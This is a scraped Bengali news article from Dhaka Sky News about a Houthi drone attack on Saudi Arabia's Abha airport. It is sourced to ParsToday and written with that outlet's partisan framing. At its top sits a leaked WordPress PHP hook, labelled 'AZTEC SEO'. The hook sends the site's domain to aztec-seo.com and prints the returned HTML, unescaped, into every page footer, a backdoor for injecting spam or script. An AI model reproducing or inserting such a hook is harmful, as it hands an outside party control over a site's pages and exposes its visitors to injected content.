/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); সৌদি বিমানবন্দরে ইয়েমেনিদের ড্রোন হামলা | Dhaka Sky News

ট্রাম্পকে বিপথে নিয়ে যাওয়ার পেছনে ছিল ইহুদিবাদীরা: ইরানের প্রেসিডেন্ট

আগের সংবাদ

৩ আফগান নারী গণমাধ্যম কর্মী হত্যার দায় স্বীকার করল দায়েশ

পরের সংবাদ

সৌদি বিমানবন্দরে ইয়েমেনিদের ড্রোন হামলা

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: March 3, 2021 , 9:43 pm

সৌদি আরবের আবহা আন্তর্জাতিক বিমানবন্দরে আবার ড্রোন হামলা চালিয়েছে ইয়েমেনের হুথি আনসারুল্লাহ আন্দোলন সমর্থিত সামরিক বাহিনী। দারিদ্রপীড়িত ইয়েমেনের বিরুদ্ধে সৌদি নেতৃত্বাধীন কথিত আরব জোট যে আগ্রাসন চালিয়ে আসছে তার জবাবে এই ড্রোন হামলা চালিয়েছে ইয়েমেনি সেনারা।

ইয়েমেনের সামরিক বাহিনীর মুখপাত্র ব্রিগেডিয়ার জেনারেল ইয়াহিয়া সারিয়ি গতকাল (মঙ্গলবার) সন্ধ্যায় সামাজিক যোগাযোগের মাধ্যম টুইটারে দেয়া এক বিবৃতিতে জানিয়েছেন, হুথি সমর্থিত সেনাবাহিনী নিজস্ব প্রযুক্তিতে তৈরি কাসেফ-টু-কে ড্রোন দিয়ে সৌদি আরবের আবহা আন্তর্জাতিক বিমানবন্দরে হামলা চালিয়েছে।

ব্রিগেডিয়ার জেনারেল ইয়াহিয়া সারিয়ি

জেনারেল সারিয়ে জানান, ইয়েমেনি ড্রোন সৌদি বিমানবন্দরের সামরিক বিমানের হ্যাঙ্গারে নিখুঁতভাবে আঘাত হানে। সৌদি জোটের অব্যাহত আগ্রাসন ও সর্বাত্মক অবরোধের জবাবে ইয়েমেনিরা এই হামলা চালিয়েছে বলে তিনি উল্লেখ করেন।

এর আগে, গত রোববার এক সংবাদ সম্মেলনে জেনারেল সারিয়ি জানিয়েছিলেন, সৌদি আরবের রাজধানী রিয়াদের গুরুত্বপূর্ণ ও স্পর্শকাতর স্থানগুলোতে জুলফিকার ব্যালিস্টিক ক্ষেপণাস্ত্র দিয়ে হামলা চালানো হয়েছে। সূত্র : পার্সটুডে